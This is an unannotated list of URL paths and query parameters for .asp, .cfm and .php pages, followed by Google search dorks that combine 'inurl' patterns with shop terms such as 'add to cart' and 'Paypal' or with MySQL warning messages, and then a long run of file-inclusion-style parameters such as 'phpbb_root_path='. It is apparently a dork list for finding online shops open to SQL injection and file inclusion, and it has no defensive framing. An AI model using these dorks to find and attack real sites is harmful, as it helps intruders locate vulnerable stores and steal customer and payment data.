categorydisplay.asp?catid=
checkout.asp?cartid=
checkout.asp?UserID=
checkout_confirmed.asp?order_id=
checkout1.asp?cartid=
comersus_listCategoriesAndProducts.asp?idCategory=
comersus_optEmailToFriendForm.asp?idProduct=
comersus_optReviewReadExec.asp?idProduct=
comersus_viewItem.asp?idProduct=
comments_form.asp?ID=
contact.asp?cartId=
content.asp?id=
customerService.asp?****ID1=
default.asp?catID=
description.asp?bookid=
details.asp?BookID=
details.asp?Press_Release_ID=
details.asp?Product_ID=
details.asp?Service_ID=
display_item.asp?id=
displayproducts.asp
downloadTrial.asp?intProdID=
emailproduct.asp?itemid=
emailToFriend.asp?idProduct=
events.asp?ID=
faq.asp?cartID=
faq_list.asp?id=
faqs.asp?id=
feedback.asp?title=
freedownload.asp?bookid=
fullDisplay.asp?item=
getbook.asp?bookid=
GetItems.asp?itemid=
giftDetail.asp?id=
help.asp?CartId=
home.asp?id=
index.asp?cart=
index.asp?cartID=
index.asp?ID=
info.asp?ID=
item.asp?eid=
item.asp?item_id=
item.asp?itemid=
item.asp?model=
item.asp?prodtype=
item.asp?shopcd=
item_details.asp?catid=
item_list.asp?maingroup
item_show.asp?code_no=
itemDesc.asp?CartId=
itemdetail.asp?item=
itemdetails.asp?catalogid=
learnmore.asp?cartID=
links.asp?catid=
list.asp?bookid=
List.asp?CatID=

listcategoriesandproducts.asp?idCategory=
modline.asp?id=
myaccount.asp?catid=
news.asp?id=
order.asp?BookID=
order.asp?id=
order.asp?item_ID=
OrderForm.asp?Cart=
page.asp?PartID=
payment.asp?CartID=
pdetail.asp?item_id=
powersearch.asp?CartId=
price.asp
privacy.asp?cartID=
prodbycat.asp?intCatalogID=
prodetails.asp?prodid=
prodlist.asp?catid=
product.asp?bookID=
product.asp?intProdID=
product_info.asp?item_id=
productDetails.asp?idProduct=
productDisplay.asp
productinfo.asp?item=
productlist.asp?ViewType=Category&CategoryID=
productpage.asp
products.asp?ID=
products.asp?keyword=
products_category.asp?CategoryID=
products_detail.asp?CategoryID=
productsByCategory.asp?intCatalogID=
prodView.asp?idProduct=
promo.asp?id=
promotion.asp?catid=
pview.asp?Item=
resellers.asp?idCategory=
results.asp?cat=
savecart.asp?CartId=
search.asp?CartID=
searchcat.asp?search_id=
Select_Item.asp?id=
Services.asp?ID=
shippinginfo.asp?CartId=
shop.asp?a=
shop.asp?action=
shop.asp?bookid=
shop.asp?cartID=
shop_details.asp?prodid=
shopaddtocart.asp
shopaddtocart.asp?catalogid=
shopbasket.asp?bookid=
shopbycategory.asp?catid=
shopcart.asp?title=
shopcreatorder.asp
shopcurrency.asp?cid=
shopdc.asp?bookid=
shopdisplaycategories.asp
shopdisplayproduct.asp?catalogid=
shopdisplayproducts.asp
shopexd.asp
shopexd.asp?catalogid=
shopping_basket.asp?cartID=
shopprojectlogin.asp
shopquery.asp?catalogid=
shopremoveitem.asp?cartid=
shopreviewadd.asp?id=
shopreviewlist.asp?id=
ShopSearch.asp?CategoryID=
shoptellafriend.asp?id=
shopthanks.asp
shopwelcome.asp?title=
show_item.asp?id=
show_item_details.asp?item_id=
showbook.asp?bookid=
showStore.asp?catID=
shprodde.asp?SKU=
specials.asp?id=
store.asp?id=
store_bycat.asp?id=
store_listing.asp?id=
Store_ViewProducts.asp?Cat=
store-details.asp?id=
storefront.asp?id=
storefronts.asp?title=
storeitem.asp?item=
StoreRedirect.asp?ID=
subcategories.asp?id=
tek9.asp?
template.asp?Action=Item&pid=
topic.asp?ID=
tuangou.asp?bookid=
type.asp?iType=
updatebasket.asp?bookid=
updates.asp?ID=
view.asp?cid=
view_cart.asp?title=
view_detail.asp?ID=
viewcart.asp?CartId=
viewCart.asp?userID=
viewCat_h.asp?idCategory=
viewevent.asp?EventID=
viewitem.asp?recor=
viewPrd.asp?idcategory=
ViewProduct.asp?misc=
voteList.asp?item_ID=
whatsnew.asp?idCategory=
WsAncillary.asp?ID=
WsPages.asp?ID=noticiasDetalle.asp?xid=
sitio/item.asp?idcd=
index.asp?site=
de/content.asp?page_id=
gallerysort.asp?iid=
products.asp?type=
event.asp?id=
showfeature.asp?id=
home.asp?ID=
tas/event.asp?id=
profile.asp?id=
details.asp?id=
past-event.asp?id=
index.asp?action=
site/products.asp?prodid=
page.asp?pId=
resources/vulnerabilities_list.asp?id=
site.asp?id=
products/index.asp?rangeid=
global_projects.asp?cid=
publications/view.asp?id=
display_page.asp?id=
pages.asp?ID=
lmsrecords_cd.asp?cdid=
product.asp?prd=
cat/?catid=
products/product-list.asp?id=
debate-detail.asp?id=
cbmer/congres/page.asp?LAN=
content.asp?id=
news.asp?ID=
photogallery.asp?id=
index.asp?id=
product/product.asp?product_no=
nyheder.htm?show=
book.asp?ID=
print.asp?id=
detail.asp?id=
book.asp?id=
content.asp?PID=
more_detail.asp?id=
content.asp?id=
view_items.asp?id=
view_author.asp?id=
main.asp?id=
english/fonction/print.asp?id=
magazines/adult_magazine_single_page.asp?magid=
product_details.asp?prodid=
magazines/adult_magazine_full_year.asp?magid=
products/card.asp?prodID=
catalog/product.asp?cat_id=
e_board/modifyform.html?code=
community/calendar-event-fr.asp?id=
products.asp?p=
news.asp?id=
view/7/9628/1.html?reply=
product_details.asp?prodid=
catalog/product.asp?pid=
rating.asp?id=
?page=
catalog/main.asp?cat_id=
index.asp?page=
detail.asp?prodid=
products/product.asp?pid=
news.asp?id=
book_detail.asp?BookID=
catalog/main.asp?cat_id=
catalog/main.asp?cat_id=
default.asp?cPath=
catalog/main.asp?cat_id=
catalog/main.asp?cat_id=
category.asp?catid=
categories.asp?cat=
categories.asp?cat=
detail.asp?prodID=
detail.asp?id=
category.asp?id=
hm/inside.asp?id=
index.asp?area_id=
gallery.asp?id=
products.asp?cat=
products.asp?cat=
media/pr.asp?id=
books/book.asp?proj_nr=
products/card.asp?prodID=
general.asp?id=
news.asp?t=
usb/devices/showdev.asp?id=
content/detail.asp?id=
templet.asp?acticle_id=
news/news/title_show.asp?id=
product.asp?id=
index.asp?url=
cryolab/content.asp?cid=
ls.asp?id=
s.asp?w=
abroad/page.asp?cid=
bayer/dtnews.asp?id=
news/temp.asp?id=
index.asp?url=
book/bookcover.asp?bookid=
index.asp/en/component/pvm/?view=
product/list.asp?pid=
cats.asp?cat=
software_categories.asp?cat_id=
print.asp?sid=
docDetail.aspx?chnum=
index.asp?section=
index.asp?page=
index.asp?page=
en/publications.asp?id=
events/detail.asp?ID=
forum/profile.asp?id=
media/pr.asp?id=
content.asp?ID=
cloudbank/detail.asp?ID=
pages.asp?id=
news.asp?id=
beitrag_D.asp?id=
content/index.asp?id=
index.asp?i=
?action=
index.asp?page=
beitrag_F.asp?id=
index.asp?pageid=
page.asp?modul=
detail.asp?id=
index.asp?w=
index.asp?modus=
news.asp?id=
news.asp?id=
aktuelles/meldungen-detail.asp?id=
item.asp?id=
obio/detail.asp?id=
page/de/produkte/produkte.asp?prodID=
packages_display.asp?ref=
shop/index.asp?cPath=
modules.asp?bookid=
product-range.asp?rangeID=
en/news/fullnews.asp?newsid=
deal_coupon.asp?cat_id=
show.asp?id=
blog/index.asp?idBlog=
redaktion/whiteteeth/detail.asp?nr=
HistoryStore/pages/item.asp?itemID=
aktuelles/veranstaltungen/detail.asp?id=
tecdaten/showdetail.asp?prodid=
?id=
rating/stat.asp?id=
content.asp?id=
viewapp.asp?id=
item.asp?id=
news/newsitem.asp?newsID=
FernandFaerie/index.asp?c=
show.asp?id=
?cat=
categories.asp?cat=
category.asp?c=

product_info.asp?id=
prod.asp?cat=
store/product.asp?productid=
browsepr.asp?pr=
product-list.asp?cid=
products.asp?cat_id=
product.asp?ItemID=
category.asp?c=
main.asp?id=
article.asp?id=
showproduct.asp?productId=
view_item.asp?item=
skunkworks/content.asp?id=
index.asp?id=
item_show.asp?id=
publications.asp?Id=
index.asp?t=
view_items.asp?id=
portafolio/portafolio.asp?id=
YZboard/view.asp?id=
index_en.asp?ref=
index_en.asp?ref=
category.asp?id_category=
main.asp?id=
main.asp?id=
calendar/event.asp?id=
default.asp?cPath=
pages/print.asp?id=
index.asp?pg_t=
_news/news.asp?id=
forum/showProfile.asp?id=
fr/commande-liste-categorie.asp?panier=
downloads/shambler.asp?id=
sinformer/n/imprimer.asp?id=
More_Details.asp?id=
directory/contenu.asp?id_cat=
properties.asp?id_cat=
forum/showProfile.asp?id=
downloads/category.asp?c=
index.asp?cat=
product_info.asp?products_id=
product_info.asp?products_id=
product-list.asp?category_id=
detail.asp?siteid=
projects/event.asp?id=
view_items.asp?id=
more_details.asp?id=
melbourne_details.asp?id=
more_details.asp?id=
detail.asp?id=
more_details.asp?id=
home.asp?cat=
idlechat/message.asp?id=
detail.asp?id=
print.asp?sid=
more_details.asp?id=
default.asp?cPath=
events/event.asp?id=
brand.asp?id=
toynbeestudios/content.asp?id=
show-book.asp?id=
more_details.asp?id=
store/default.asp?cPath=
property.asp?id=
product_details.asp?id=
more_details.asp?id=
view-event.asp?id=
content.asp?id=
book.asp?id=
page/venue.asp?id=
print.asp?sid=
colourpointeducational/more_details.asp?id=
print.asp?sid=
browse/book.asp?journalID=
section.asp?section=
bookDetails.asp?id=
profiles/profile.asp?profileid=
event.asp?id=
gallery.asp?id=
category.asp?CID=
corporate/newsreleases_more.asp?id=
print.asp?id=
view_items.asp?id=
more_details.asp?id=
county-facts/diary/vcsgen.asp?id=
idlechat/message.asp?id=
podcast/item.asp?pid=
products.asp?act=
details.asp?prodId=
socsci/events/full_details.asp?id=
ourblog.asp?categoryid=
mall/more.asp?ProdID=
archive/get.asp?message_id=
review/review_form.asp?item_id=
english/publicproducts.asp?groupid=
news_and_notices.asp?news_id=
rounds-detail.asp?id=
gig.asp?id=
board/view.asp?no=
index.asp?modus=
news_item.asp?id=
rss.asp?cat=
products/product.asp?id=
details.asp?ProdID=
els_/product/product.asp?id=
store/description.asp?iddesc=
socsci/news_items/full_story.asp?id=
modules/forum/index.asp?topic_id=
feature.asp?id=
products/Blitzball.htm?id=
profile_print.asp?id=
questions.asp?questionid=
html/scoutnew.asp?prodid=
main/index.asp?action=
********.asp?cid=
********.asp?cid=
news.asp?type=
index.asp?page=
viewthread.asp?tid=
summary.asp?PID=
news/latest_news.asp?cat_id=
index.asp?cPath=
category.asp?CID=
index.asp?pid=
more_details.asp?id=
specials.asp?osCsid=
search/display.asp?BookID=
articles.asp?id=
print.asp?sid=
page.asp?id=
more_details.asp?id=
newsite/pdf_show.asp?id=
shop/category.asp?cat_id=
shopcafe-shop-product.asp?bookId=
shop/books_detail.asp?bookID=
index.asp?cPath=
more_details.asp?id=
news.asp?id=

 

more_details.asp?id=
shop/books_detail.asp?bookID=
more_details.asp?id=
blog.asp?blog=
index.asp?pid=
prodotti.asp?id_cat=
category.asp?CID=
more_details.asp?id=
poem_list.asp?bookID=
more_details.asp?id=
content.asp?categoryId=
authorDetails.asp?bookID=
press_release.asp?id=
item_list.asp?cat_id=
colourpointeducational/more_details.asp?id=
index.asp?pid=
download.asp?id=
shop/category.asp?cat_id=
i-know/content.asp?page=
store/index.asp?cat_id=
yacht_search/yacht_view.asp?pid=
pharmaxim/category.asp?cid=
print.asp?sid=
specials.asp?osCsid=
store.asp?cat_id=
category.asp?cid=
displayrange.asp?rangeid=
product.asp?id=
csc/news-details.asp?cat=
products-display-details.asp?prodid=
stockists_list.asp?area_id=
news/newsitem.asp?newsID=
index.asp?pid=
newsitem.asp?newsid=
category.asp?id=
news/newsitem.asp?newsID=
details.asp?prodId=
publications/publication.asp?id=
purelydiamond/products/category.asp?cat=
category.asp?cid=
product/detail.asp?id=
news/newsitem.asp?newsID=
details.asp?prodID=
item.asp?item_id=
edition.asp?area_id=
page.asp?area_id=
view_newsletter.asp?id=
library.asp?cat=
categories.asp?cat=
page.asp?area_id=
categories.asp?cat=
publications.asp?id=
item.asp?sub_id=
page.asp?area_id=
page.asp?area_id=
category.asp?catid=
content.asp?cID=
newsitem.asp?newsid=
frontend/category.asp?id_category=
news/newsitem.asp?newsID=
things-to-do/detail.asp?id=
page.asp?area_id=
page.asp?area_id=
listing.asp?cat=
item.asp?iid=
customer/home.asp?cat=
staff/publications.asp?sn=
news/newsitem.asp?newsID=
library.asp?cat=
main/index.asp?uid=
library.asp?cat=
shop/eventshop/product_detail.asp?itemid=
news/newsitem.asp?newsID=
news/newsitem.asp?newsID=
library.asp?cat=
FullStory.asp?Id=
publications.asp?ID=
publications/book_reviews/full_review.asp?id=
newsitem.asp?newsID=
newsItem.asp?newsId=
site/en/list_service.asp?cat=
page.asp?area_id=
product.asp?ProductID=
releases_headlines_details.asp?id=
product.asp?shopprodid=
product.asp?productid=
product.asp?product=
product.asp?product_id=
productlist.asp?id=
product.asp?shopprodid=
garden_equipment/pest-weed-control/product.asp?pr=
product.asp?shopprodid=
browsepr.asp?pr=
productlist.asp?id=
kshop/product.asp?productid=
product.asp?pid=
showproduct.asp?prodid=
product.asp?productid=
productlist.asp?id=
index.asp?pageId=
productlist.asp?tid=
product-list.asp?id=
onlinesales/product.asp?product_id=
garden_equipment/Fruit-Cage/product.asp?pr=
product.asp?shopprodid=
product_info.asp?products_id=
productlist.asp?tid=
showsub.asp?id=
productlist.asp?fid=
products.asp?cat=
products.asp?cat=
product-list.asp?id=
product.asp?sku=
store/product.asp?productid=
products.asp?cat=
productList.asp?cat=
product_detail.asp?product_id=
product.asp?pid=
wiki/pmwiki.asp?page****=
summary.asp?PID=
productlist.asp?grpid=
cart/product.asp?productid=
db/CART/product_details.asp?product_id=
ProductList.asp?id=
products/product.asp?id=
product.asp?shopprodid=
product_info.asp?products_id=
product_ranges_view.asp?ID=
cei/cedb/projdetail.asp?projID=
products.asp?DepartmentID=
product.asp?shopprodid=
product.asp?shopprodid=
product_info.asp?products_id=
index.asp?news=
education/content.asp?page=
Interior/productlist.asp?id=
products.asp?categoryID=
modules.asp?****=
message/comment_threads.asp?postID=
artist_art.asp?id=
products.asp?cat=
index.asp?option=
ov_tv.asp?item=
index.asp?lang=
showproduct.asp?cat=
index.asp?lang=
product.asp?bid=
product.asp?bid=
cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId=
item_show.asp?lid=
?pagerequested=
downloads.asp?id=
print.asp?sid=
print.asp?sid=
product.asp?intProductID=
productList.asp?id=
product.asp?intProductID=
more_details.asp?id=
more_details.asp?id=
books.asp?id=
index.asp?offs=
mboard/replies.asp?parent_id=
Computer Science.asp?id=
news.asp?id=
pdf_post.asp?ID=
reviews.asp?id=
art.asp?id=
prod.asp?cat=
event_info.asp?p=
view_items.asp?id=
home.asp?cat=
item_book.asp?CAT=
www/index.asp?page=
schule/termine.asp?view=
goods_detail.asp?data=
storemanager/contents/item.asp?page_code=
view_items.asp?id=
customer/board.htm?mode=
help/com_view.html?code=
n_replyboard.asp?typeboard=
eng_board/view.asp?T****=
prev_results.asp?prodID=
bbs/view.asp?no=
gnu/?doc=
zb/view.asp?uid=
global/product/product.asp?gubun=
inurl:”.php?cat=”+intext:”Paypal”+site:UK

inurl:”.php?cat=”+intext:”/Buy Now/”+site:.net

inurl:”.php?cid=”+intext:”online+betting”

inurl:”.php?id=” intext:”View cart”

inurl:”.php?id=” intext:”Buy Now”

inurl:”.php?id=” intext:”add to cart”

inurl:”.php?id=” intext:”shopping”

inurl:”.php?id=” intext:”boutique”

inurl:”.php?id=” intext:”/store/”

inurl:”.php?id=” intext:”/shop/”

inurl:”.php?id=” intext:”toys”

inurl:”.php?cid=”

inurl:”.php?cid=” intext:”shopping”

inurl:”.php?cid=” intext:”add to cart”

inurl:”.php?cid=” intext:”Buy Now”

inurl:”.php?cid=” intext:”View cart”

inurl:”.php?cid=” intext:”boutique

inurl:”.php?cid=” intext:”/store/”

inurl:”.php?cid=” intext:”/shop/”

inurl:”.php?cid=” intext:”Toys”

inurl:”.php?cat=”

inurl:”.php?cat=” intext:”shopping”

inurl:”.php?cat=” intext:”add to cart”

inurl:”.php?cat=” intext:”Buy Now”

inurl:”.php?cat=” intext:”View cart”

inurl:”.php?cat=” intext:”boutique

” inurl:”.php?cat=” intext:”/store/”

inurl:”.php?cat=” intext:”/shop/”

inurl:”.php?cat=” intext:”Toys”

inurl:”.php?catid=”

inurl:”.php?catid=” intext:”View cart”

inurl:”.php?catid=” intext:”Buy Now”

inurl:”.php?catid=” intext:”add to cart”

inurl:”.php?catid=” intext:”shopping”

inurl:”.php?catid=” intext:”boutique”

inurl:”.php?catid=” intext:”/store/”

inurl:”.php?catid=” intext:”/shop/”

inurl:”.php?catid=” intext:”Toys”

inurl:”.php?categoryid=”

inurl:”.php?categoryid=” intext:”View cart”

inurl:”.php?categoryid=” intext:”Buy Now”

inurl:”.php?categoryid=” intext:”add to cart”

inurl:”.php?categoryid=” intext:”shopping”

inurl:”.php?categoryid=” intext:”boutique”

inurl:”.php?categoryid=” intext:”/store/”

inurl:”.php?categoryid=” intext:”/shop/”

inurl:”.php?categoryid=” intext:”Toys”

inurl:”.php?pid=”

inurl:”.php?pid=” intext:”shopping”

inurl:”.php?pid=” intext:”add to cart”

inurl:”.php?pid=” intext:”Buy Now”

inurl:”.php?pid=” intext:”View cart”

inurl:”.php?pid=” intext:”boutique”

cat.asp?cat=
productlist.asp?catalogid=

Category.asp?category_id=

Category.cfm?category_id=

category.asp?cid=

category.cfm?cid=

category.asp?cat=

category.cfm?cat=

category.asp?id=

index.cfm?pageid=

category.asp?catid=

Category.asp?c=

Category.cfm?c=

productlist.cfm?catalogid=

productlist.asp?catalogid=

viewitem.asp?catalogid=

viewitem.cfm?catalogid=

catalog.cfm?catalogId=

catalog.asp?catalogId=

department.cfm?dept=

department.asp?dept=

itemdetails.cfm?catalogId=

itemdetails.asp?catalogId=

product_detail.asp?catalogid=

product_detail.cfm?catalogid=

product_list.asp?catalogid=

product_list.cfm?catalogid=

ShowProduct.cfm?CatID=

ShowProduct.asp?CatID=

search_results.cfm?txtsearchParamCat=

search_results.asp?txtsearchParamCat=

itemdetails.cfm?catalogId=

itemdetails.asp?catalogId=

store-page.cfm?go=

store-page.asp?go=

Detail.cfm?CatalogID=

Detail.asp?CatalogID=

browse.cfm?category_id=

view.cfm?category_id=

products.cfm?category_id=

index.cfm?Category_ID=

detail.cfm?id=

category.cfm?id=

showitems.cfm?category_id=

ViewProduct.asp?PID=

ViewProduct.cfm?PID=

shopdisplayproducts.asp?catalogid=

shopdisplayproducts.cfn?catalogid=

displayproducts.cfm?category_id=

displayproducts.asp?category_id=

DisplayProducts.asp?prodcat=

DisplayProducts.cfm?prodcat=x

productDetail.cfm?ProductID=

products.php?subcat_id=

showitem.cfm?id=21

productdetail.cfm?pid=

default.cfm?action=46

products_accessories.asp?CatId=

Store_ViewProducts.asp?Cat=

category.cfm?categoryID=

category.asp?category=

tepeecart.cfm?shopid=

view_product.asp?productID=

ProductDetails.asp?prdId=12

products.cfm?ID=

detail.asp?product_id=

product_detail.asp?product_id=

products.php?subcat_id=

product.php?product_id=

view_product.cfm?productID=

product_details.asp?prodid=

shopdisplayproducts.cfm?id=

displayproducts.cfm?id=
trainers.php?id=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
“id=” & intext:”Warning: mysql_fetch_array()
“id=” & intext:”Warning: getimagesize()
“id=” & intext:”Warning: session_start()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: mysql_query()
“id=” & intext:”Warning: array_merge()
“id=” & intext:”Warning: preg_match()
“id=” & intext:”Warning: ilesize()
“id=” & intext:”Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=

viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
“id=” & intext:”Warning: mysql_fetch_assoc()
“id=” & intext:”Warning: is_writable()
“id=” & intext:”Warning: Unknown()
“id=” & intext:”Warning: mysql_result()
“id=” & intext:”Warning: pg_exec()
“id=” & intext:”Warning: require()
buy.php?category=
pageid=
page.php?file=
show.php?id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
select_biblio.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
loadpsb.php?id=
announce.php?id=
participant.php?id=
download.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
index.php?=
profile_view.php?id=
category.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
tradeCategory.php?id=
transcript.php?id=
item_id=
news-full.php?id=
aboutbook.php?id=
preview.php?id=
material.php?id=
read.php?id=
viewapp.php?id=
story.php?id=
newsone.php?id=
rubp.php?idr=
art.php?idm=
title.php?id=
index1.php?modo=
include.php?*[*]*=
nota.php?pollname=
index3.php?p=
padrao.php?pre=
home.php?pa=
main.php?type=
sitio.php?start=
*.php?include=
general.php?xlink=
show.php?go=
nota.php?ki=
down*.php?oldal=
layout.php?disp=
enter.php?chapter=
base.php?incl=
enter.php?mod=
show.php?corpo=
head.php?*[*]*=
info.php?strona=
template.php?str=
main.php?doshow=
view.php?*[*]*=
index.php?to=
page.php?cmd=
view.php?b=
info.php?option=
show.php?x=
template.php?texto=
index3.php?ir=
print.php?chapter=
file.php?inc=
file.php?cont=
view.php?cmd=
include.php?chapter=
path.php?my=
principal.php?param=
general.php?menue=
index1.php?b=
info.php?chapter=
nota.php?chapter=
general.php?include=
start.php?addr=
index1.php?qry=
index1.php?loc=
page.php?addr=
index1.php?dir=
principal.php?pr=
press.php?seite=
head.php?cmd=
home.php?sec=
home.php?category=
standard.php?cmd=
mod*.php?thispage=
base.php?to=
view.php?choix=
base.php?panel=
template.php?mod=
info.php?j=
blank.php?pref=
sub*.php?channel=
standard.php?in=
general.php?cmd=
pagina.php?panel=
template.php?where=
path.php?channel=
gery.php?seccion=
page.php?tipo=
sitio.php?rub=
pagina.php?u=
file.php?ir=
*inc*.php?sivu=
path.php?start=
page.php?chapter=
home.php?recipe=
enter.php?pname=
layout.php?path=
print.php?open=
mod*.php?channel=
down*.php?phpbb_root_path=
*inc*.php?str=
gery.php?phpbb_root_path=
include.php?middlePart=
sub*.php?destino=
info.php?read=
home.php?sp=
main.php?strona=
sitio.php?get=
sitio.php?index=
index3.php?option=
enter.php?a=
main.php?second=
print.php?pname=
blank.php?itemnav=
blank.php?pagina=
index1.php?d=
down*.php?where=
*inc*.php?include=
path.php?pre=
home.php?loader=
start.php?eval=
index.php?disp=
head.php?mod=
sitio.php?section=
nota.php?doshow=
home.php?seite=
home.php?a=
page.php?url=
pagina.php?left=
layout.php?c=
principal.php?goto=
standard.php?base_dir=
home.php?where=
page.php?sivu=
*inc*.php?adresa=
padrao.php?str=
include.php?my=
show.php?home=
index.php?load=
index3.php?rub=
sub*.php?str=
start.php?index=
nota.php?mod=
sub*.php?mid=
index1.php?*[*]*=
pagina.php?oldal=
padrao.php?loc=
padrao.php?rub=
page.php?incl=
gery.php?disp=
nota.php?oldal=
include.php?u=
principal.php?pagina=
print.php?choix=
head.php?filepath=
include.php?corpo=
sub*.php?action=
head.php?pname=
press.php?dir=
show.php?xlink=
file.php?left=
nota.php?destino=
general.php?module=
index3.php?redirect=
down*.php?param=
default.php?ki=
padrao.php?h=
padrao.php?read=
mod*.php?cont=

index1.php?l=
down*.php?pr=
gery.php?viewpage=
template.php?load=
nota.php?pr=
padrao.php?destino=
index2.php?channel=
principal.php?opcion=
start.php?str=
press.php?*[*]*=
index.php?ev=
pagina.php?pre=
nota.php?content=
include.php?adresa=
sitio.php?t=
index.php?sivu=
principal.php?q=
path.php?ev=
print.php?module=
index.php?loc=
nota.php?basepath=
padrao.php?tipo=
index2.php?in=
principal.php?eval=
file.php?qry=
info.php?t=
enter.php?play=
general.php?var=
principal.php?s=
standard.php?pagina=
standard.php?subject=
base.php?second=
head.php?inc=
pagina.php?basepath=
main.php?pname=
*inc*.php?modo=
include.php?goto=
file.php?pg=
head.php?g=
general.php?header=
start.php?*root*=
enter.php?pref=
index3.php?open=
start.php?module=
main.php?load=
enter.php?pg=
padrao.php?redirect=
pagina.php?my=
gery.php?pre=
enter.php?w=
info.php?texto=
enter.php?open=
base.php?rub=
gery.php?*[*]*=
include.php?cmd=
standard.php?dir=
layout.php?page=
index3.php?pageweb=
include.php?numero=
path.php?destino=
index3.php?home=
default.php?seite=
path.php?eval=
base.php?choix=
template.php?cont=
info.php?pagina=
default.php?x=
default.php?option=
gery.php?ki=
down*.php?second=
blank.php?path=
pagina.php?v=
file.php?pollname=
index3.php?var=
layout.php?goto=
pagina.php?incl=
home.php?action=
include.php?oldal=
print.php?left=
print.php?u=
nota.php?v=
home.php?str=
press.php?panel=
page.php?mod=
default.php?param=
down*.php?texto=
mod*.php?dir=
view.php?where=
blank.php?subject=
path.php?play=
base.php?l=
index2.php?rub=
general.php?opcion=
layout.php?xlink=
padrao.php?name=
pagina.php?nivel=
default.php?oldal=
template.php?k=
main.php?chapter=
layout.php?chapter=
layout.php?incl=
include.php?url=
base.php?sivu=
index.php?link=
sub*.php?cont=
info.php?oldal=
general.php?rub=
default.php?str=
head.php?ev=
sub*.php?path=
view.php?page=
main.php?j=
index2.php?basepath=
gery.php?qry=
main.php?url=
default.php?incl=
show.php?redirect=
index1.php?pre=
general.php?base_dir=
start.php?in=
show.php?abre=
index1.php?home=
home.php?ev=
index2.php?ki=
base.php?pag=
default.php?ir=
general.php?qry=
index2.php?home=
press.php?nivel=
enter.php?pr=
blank.php?loader=
start.php?cmd=
padrao.php?d=
sitio.php?recipe=
principal.php?read=
standard.php?showpage=
main.php?pg=
page.php?panel=
press.php?addr=
template.php?s=
main.php?tipo=
*inc*.php?ev=
padrao.php?page=
show.php?thispage=
home.php?secao=
main.php?start=
enter.php?mid=
press.php?id=
main.php?inc=
index3.php?cmd=
index.php?pname=
press.php?subject=
include.php?sec=
index3.php?xlink=
general.php?texto=
index3.php?go=
index.php?cmd=
index3.php?disp=
index3.php?left=
sub*.php?middle=
show.php?modo=
index1.php?pagina=
head.php?left=
enter.php?phpbb_root_path=
show.php?z=
start.php?basepath=
blank.php?strona=
template.php?y=
page.php?where=
layout.php?category=
index1.php?my=
principal.php?phpbb_root_path=
nota.php?channel=
page.php?choix=
start.php?xlink=
home.php?k=
standard.php?phpbb_root_path=
principal.php?middlePart=
mod*.php?m=
index.php?recipe=
template.php?path=
pagina.php?dir=
sitio.php?abre=
index1.php?recipe=
blank.php?page=
sub*.php?category=
*inc*.php?bOdy=
enter.php?middle=
home.php?path=
down*.php?pre=
base.php?w=
main.php?path=
nota.php?ir=
press.php?link=
gery.php?pollname=
down*.php?open=
down*.php?pageweb=
default.php?eval=
view.php?showpage=
show.php?get=
sitio.php?tipo=
layout.php?cont=
default.php?destino=
padrao.php?seccion=
down*.php?r=
main.php?param=
standard.php?e=
down*.php?in=
nota.php?include=
sitio.php?secao=
print.php?my=
